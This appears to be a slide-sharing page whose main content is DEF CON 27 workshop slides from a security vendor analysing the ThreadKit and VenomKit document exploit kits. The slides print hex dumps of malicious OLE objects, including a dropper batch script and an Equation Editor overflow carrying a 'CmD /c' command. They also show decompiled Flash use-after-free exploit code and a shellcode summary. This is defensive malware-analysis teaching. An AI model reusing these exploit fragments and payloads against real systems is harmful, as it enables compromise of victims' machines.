DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 

More from Felipe Prado (20)

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
 

Recently uploaded

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Speck&Tech
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
Techgropse Pvt.Ltd.
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 

Recently uploaded (20)

Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 

DEF CON 27 - workshop - JOSH REYNOLDS - from ek to dek slides

  • 1. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FROM EK TO DEK: ANALYZING DOCUMENT EXPLOIT KITS JOSHUA REYNOLDS, SENIOR SECURITY RESEARCHER
  • 2. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. DOCUMENT EXPLOIT KITS § Traditional Exploit Kits such as RIG and Angler fingerprint browsers and deploy multiple exploits for browsers and plugins § Document Exploit Kits deploy multiple exploits for Microsoft Office, DCOM servers and ActiveX controls (E.G Adobe Flash) in a single document
  • 3. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT AND VENOMKIT § Two prominent Document Exploit Kit families § Embed multiple exploits into a single RTF document § Multiple infection chains upon successful exploitation § Use of whitelist bypasses and other common Red Team/Pentest techniques § Use for distribution of FormBook, AZORult, LokiBot, and Netwire § Targeted campaigns by COBALT SPIDER
  • 4. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT CAMPAIGN EXAMPLE § Spear-phishing campaign conducted by COBALT SPIDER § Posing as European Central Bank § ThreadKit document dropping COBINT
  • 5. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 6. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. EXPLOITS § Multiple exploit attempts are possible due to load ordering § Microsoft Office Moniker Logic Bug Exploits § CVE-2017-0199 § CVE-2017-8570 § Equation Editor Buffer Overflow Exploits § CVE-2017-11882 § CVE-2018-0802 § Adobe Flash Use After Free Exploit § CVE-2018-4878
  • 7. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. THREADKIT INFECTION CHAIN EXAMPLE ThreadKit.rtf CVE-2018-4878 CVE-2018-0802 Decoy.docUpdate.sct CVE-2017-8570 Task.bat CVE-2017-11882 SaVer.scr
  • 8. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. VENOMKIT INFECTION CHAIN EXAMPLE VenomKit.rtf Decoy.doc AnTleHN.sct CVE-2017-8570 aaaaaaaa.txt CVE-2017-11882 Payload.exe cmstp.exe
  • 9. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. RTF OVERVIEW § Microsoft proprietary plaintext document format § Supports embedded content § Object Linking and Embedding (OLE) objects § Pictures § Fonts § Annotations § Drawing Objects § Use of control words, control symbols and groups to define format and embedded objects § Destination control words for embedded OLE objects
  • 10. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. RTF OVERVIEW { objectobjhtmlv { objdata 0105000002000000080000005061636b616765000000000000000000310 1000002007461736b2e62617400433a5c496e74656c5c7461736b2e6261 74000000030012000000433a5c496e74656c5c7461736b2-snip- } } Objdata destination control word Hex encoded OLE object
  • 11. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. OLE OVERVIEW § Create documents (container application) to contain or externally reference data for another application (creating application) § Embedded Objects – Contain stored application data § Linked Objects – Reference external application data in another application § Creating Application is identified using OLE class names or CLSID § Widely supported applications, including DCOM servers and Adobe Flash
  • 12. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. 00000000: 0105 0000 0200 0000 0800 0000 5061 636b ............Pack 00000010: 6167 6500 0000 0000 0000 0000 3101 0000 age.........1... 00000020: 0200 7461 736b 2e62 6174 0043 3a5c 496e ..task.bat.C:In 00000030: 7465 6c5c 7461 736b 2e62 6174 0000 0003 teltask.bat.... 00000040: 0012 0000 0043 3a5c 496e 7465 6c5c 7461 .....C:Intelta 00000050: 736b 2e62 6174 0096 0000 0045 4348 4f20 sk.bat.....ECHO 00000060: 4f46 460d 0a73 6574 2074 703d 2225 7465 OFF..set tp="%te 00000070: 6d70 255c 626c 6f63 6b2e 7478 7422 0d0a mp%block.txt".. 00000080: 4946 2045 5849 5354 2025 7470 2520 2865 IF EXIST %tp% (e 00000090: 7869 7429 2045 4c53 4520 2873 6574 2074 xit) ELSE (set t 000000a0: 703d 2225 7465 6d70 255c 626c 6f63 6b2e p="%temp%block. 000000b0: 7478 7422 2026 2063 6f70 7920 4e55 4c20 txt" & copy NUL 000000c0: 2574 7025 2026 2073 7461 7274 202f 6220 %tp% & start /b 000000d0: 2574 656d 7025 5c32 6e64 2e62 6174 290d %temp%2nd.bat). 000000e0: 0a64 656c 2022 257e 6630 220d 0a65 7869 .del "%~f0"..exi 000000f0: 7411 0000 0043 003a 005c 0049 006e 0074 t....C.:..I.n.t 00000100: 0065 006c 005c 0074 0061 0073 006b 002e .e.l..t.a.s.k.. 00000110: 0062 0061 0074 0008 0000 0074 0061 0073 .b.a.t.....t.a.s 00000120: 006b 002e 0062 0061 0074 0011 0000 0043 .k...b.a.t.....C 00000130: 003a 005c 0049 006e 0074 0065 006c 005c .:..I.n.t.e.l. 00000140: 0074 0061 0073 006b 002e 0062 0061 0074 .t.a.s.k...b.a.t 00000150: 0001 0500 0000 0000 00 ......... OLEVersion FormatID (0x00000002 denotes an EmbeddedObject) ClassName with prefixed length (Package class object) NativeDataSize (size of embedded object data) NativeData (object raw data, in this case a .bat script)
  • 13. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. COMPOUND MONIKER LOGIC EXPLOIT § CVE-2017-8570 is a logic vulnerability in Microsoft Office § Allows execution of a local scriptlet file using StdOleLink class object § Scriptlet is a Package object written to %TEMP% when document is opened § Composite moniker § File Moniker references scriptlet § New Moniker § Placing logic exploits first in load order means no crashing and remaining exploit objects are loaded
  • 14. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. COMPOSITE MONIKER OLE OBJECT 00000000 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................ 00000010 00 00 00 00 00 00 00 00 C0 00 00 00 09 03 00 00 ................ 00000020 00 00 00 00 C0 00 00 00 00 00 00 46 02 00 00 00 ...........F.... 00000030 03 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F 00000040 00 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060 0E 00 AD DE 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070 00 00 00 00 00 00 00 00 38 00 00 00 32 00 00 00 ........8...2... 00000080 03 00 25 00 74 00 4D 00 70 00 25 00 5C 00 69 00 ..%.t.M.p.%..i. 00000090 6E 00 74 00 65 00 6C 00 64 00 72 00 69 00 76 00 n.t.e.l.d.r.i.v. 000000A0 65 00 72 00 75 00 70 00 64 00 31 00 2E 00 73 00 e.r.u.p.d.1...s. 000000B0 63 00 74 00 C6 AF AB EC 19 7F D2 11 97 8E 00 00 c.t............. 000000C0 F8 75 7E 2A 00 00 00 00 00 00 00 00 00 00 00 00 .u~*............ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF ................ 000000E0 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F 000000F0 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ................ CLSID identifying composite moniker CLSID identifying file moniker CLSID identifying new moniker Path to scriptlet to execute
  • 15. STATICALLY ANALYZE THREADKIT COMPOSITE MONIKER EXPLOIT INFECTION CHAIN Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 16. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. EQUATION EDITOR BUFFER OVERFLOW EXPLOITS § CVE-2017-11882 and CVE-2018-0802 § Creating Application is Microsoft Equation Editor (EQNEDT32.EXE) § Launched by DCOM Server Process Launcher as a Distributed Object Linking and Embedding (DCOM) server § Microsoft Word acts as client to communicate binary equation messages to server to process § DCOM Server crashes do not affect loading of remaining exploits
  • 17. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FONT RECORD BUFFER OVERFLOW § CVE-2017-11882 § Unprotected strcpy into stack buffer with user controlled data § MTEF Font record § No DEP, ASLR or stack cookies results in a vanilla buffer overflow § Overwrite return address with call to WinExec with supplied string argument as Font name to execute Package object from %TEMP%
  • 18. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. FONT RECORD BUFFER OVERFLOW 00000ca0: 0000 0800 0043 6d44 202f 6320 436d 4420 .....CmD /c CmD 00000cb0: 3c20 2225 746d 5025 5c61 6161 6161 6161 < "%tmP%aaaaaaa 00000cc0: 6161 612e 7478 7422 2026 2065 7869 7420 aaa.txt" & exit 00000cd0: 2012 0c63 0044 0002 8165 0002 8166 0000 ..c.D...e...f.. Font record Name field WinExec Return Address
  • 19. DYNAMICALLY ANALYZE EQNEDT32.EXE EXPLOITATION INFECTION CHAIN Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 20. STATICALLY ANALYZE EQNEDT32.EXE TO IDENTIFY CVE-2017-11882 Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 21. DYNAMICALLY ANALYZE EQNEDT32.EXE CVE-2017-11882 EXPLOITATION Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 22. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF § CVE-2018-4878 § Flash Embedded OLE CLSID cause ActiveX control DLL to be loaded into Word § DLL processes embedded Shockwave Flash (SWF) object § No sandboxing (such as in a browser environment) § Use After Free may result in a crash in Word but it’s the last exploit to be attempted
  • 23. STATICALLY ANALYZE ACTIONSCRIPT TO IDENTIFY UAF TRIGGER Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 24. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – UAF TRIGGER public function MainExp() { this.shellcodBytes = MainExp_shellcodBytes; super(); data14 = new this.shellcodBytes() as ByteArray; data14.endian = Endian.LITTLE_ENDIAN; setTimeout(this.startexp,10); } public function startexp() : void { this.var_3 = new UAFGenerator(this); }
  • 25. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – UAF TRIGGER public function UAFGenerator(param1:MainExp) { this.method_2(); try { new LocalConnection().connect("foo"); new LocalConnection().connect("foo"); } catch(e:Error) { this.var_13 = new DRM_obj(); } this.var_14 = new Timer(100,1000); this.var_14.addEventListener("timer",this.method_1); this.var_14.start(); }
  • 26. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - UAF TRIGGER public function method_2() : void { var _loc1_:PSDK = PSDK.pSDK; var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher(); this.var_15 = _loc1_.createMediaPlayer(_loc2_); this.var_16 = new DRM_obj(); this.var_15.drmManager.initialize(this.var_16); this.var_16 = null; }
  • 27. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - UAF TRIGGER public function method_1(param1:TimerEvent) : void { if(this.var_13.a1 != 4369) { this.var_14.stop(); this.flash25(); } }
  • 28. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – DLL MEMORY SEARCH public static var flash72:Boolean = Capabilities.version.toUpperCase().search("WIN") >= 0; while(var_12 < size) { flash21.position = b + flash32(b0 + var_12); if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll") { oft = flash32(b0 + var_12 - 3 * 4); ft = flash32(b0 + var_12 + 4); break; } var_12 = var_12 + 5 * 4; }
  • 29. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF – GADGET RESOLUTION -snip- if(flash21.readUTF().toLowerCase() == "virtualprotect") { gadget3 = flash32(b + ft + var_12 * 4); c++; -snip- else { flash21.position = b + b0; if(flash21.readUTF().toLowerCase() == "createprocessa") { CreateProcessFunc = flash32(b + ft + var_12 * 4); c++; -snip-
  • 30. STATICALLY ANALYZE ACTIONSCRIPT TO EXTRACT AND ANALYZE SHELLCODE Hands-On Exercise 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
  • 31. 2019 CROWDSTRIKE, INC. ALL RIGHTS RESERVED. ADOBE FLASH UAF - SHELLCODE § Shellcode walks the InMemoryOrderModuleList § Hashes each module name to find kernel32.dll with the hash 0x6A4ABC5B § Export table for kernel32.dll is searched for two hex values in memory, 0x50746547 meaning “PteG” and 0x41636F72 meaning “Acor”, i.e GetProcA, which is the substring used to identify the GetProcAddress function § 0x636578 (meaning “cex”) and 0x456E6957 (meaning “EniW”) i.e WinExec § GetProcAddress to resolve the function address § WinExec is called to execute the following command: § cmd.exe /c %temp%task.bat